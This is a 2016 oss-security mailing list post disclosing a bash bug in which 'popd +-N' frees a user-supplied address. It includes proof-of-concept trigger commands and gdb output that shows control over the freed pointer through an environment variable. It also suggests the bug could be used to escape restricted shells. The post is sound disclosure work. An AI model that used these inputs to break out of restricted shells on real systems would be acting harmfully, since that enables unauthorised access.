Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 17 Nov 2016 12:04:49 -0500
From: Fernando Muñoz <fernando@...l-life.com>
To: oss-security@...ts.openwall.com
Cc: Chester Ramey <chet.ramey@...e.edu>
Subject: bash - popd controlled free

bash - popd controlled free
====================

popd can be tricked to free a user supplied address in the following way:

$ popd +-111111

This could be used to bypass restricted shells (rsh) on some
environments to cause use-after-free.

This was already reported to bash devs and only considered a bug, if
Mitre consider it could have a security impact, please assign a CVE.

Details
======
$ gdb bash
...
(gdb) r -c 'popd +-67372036'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036'

Program received signal SIGSEGV, Segmentation fault.
0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384
384          free (pushd_directory_list[i]);
(gdb) print pushd_directory_list[i]
Cannot access memory at address 0x10101010

----
$ export AA=`perl -e 'print "A"x100000'`
$ gdb ./bash
...
(gdb) x/s *((char **)environ+13)
0xbffe75d4:    "AA=", 'A' <repeats 197 times>...
(gdb) run -c 'popd +-805281142'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142'

Program received signal SIGSEGV, Segmentation fault.
internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384,
flags=<optimized out>) at malloc.c:863
863      if (p->mh_alloc == ISMEMALIGN)


- Fernando

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.